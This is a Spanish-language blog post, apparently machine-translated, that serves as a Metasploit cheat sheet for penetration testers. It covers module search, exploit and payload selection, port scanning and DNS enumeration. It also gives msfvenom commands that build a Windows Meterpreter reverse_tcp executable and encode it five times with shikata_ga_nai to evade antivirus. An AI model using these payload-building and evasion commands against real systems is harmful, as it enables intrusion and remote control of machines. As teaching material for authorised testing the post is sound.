Post193 nn

Introducción

 

El Proyecto Metasploit es un proyecto de seguridad informática que proporciona información sobre vulnerabilidades y ayuda en el desarrollo de pruebas de penetración y firmas IDS.


Metasploit es una herramienta popular utilizada por los expertos de Pentest.

 

 

Trucos

 

Búsqueda de módulo:

 

msf > search [regex]

 

Especifique y explote para usar:

 

msf > use exploit/[ExploitPath]

 

Especifique una carga útil para utilizar:

 

msf > set PAYLOAD [PayloadPath]

 

Mostrar opciones para los módulos actuales:

 

msf > show options

 

Establecer opciones:

 

msf > set [Option] [Value]

 

Comience a explotar:

 

msf > exploit 

 

Módulos auxiliares útiles

 

Escáner de puertos:

 

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

 

Enumeración DNS:

 

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

 

Servidor FTP:

 

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

 

Servidor proxy:

 

msf > use auxiliary/server/socks4
msf > run 

 

Msfvenom

 

La herramienta msfvenom se puede usar para generar cargas útiles Metasploit (como Meterpreter) como archivos independientes y, opcionalmente, codificarlas. Esta herramienta reemplaza las antiguas herramientas msfpayload y msfencode. Ejecute con '' -l payloads '' para obtener una lista de cargas útiles.

 

$ msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Ejemplo

 

Invierta la carga útil de Meterpreter como un archivo ejecutable y se redirige a un archivo:

 

$ msfvenom -p windows/meterpreter/ reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe

Opciones de formato (especificadas con –f) --help-format: muestra los formatos de salida disponibles
exe - Pl ejecutable - Perl rb - Ruby raw - Shellcode sin procesar c - Código C

 

Codificación de cargas útiles con msfvenom

 

La herramienta msfvenom se puede utilizar para aplicar un nivel de codificación para la omisión de antivirus. Ejecute con '-l codificadores' para obtener una lista de codificadores.

 

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

 

Ejemplo


Codifique una carga útil de msfpayload 5 veces usando el codificador shikata-ga-nai y ejecute como ejecutable:

 

$ msfvenom -p windows/meterpreter/ reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe



Artículos que te pueden interesar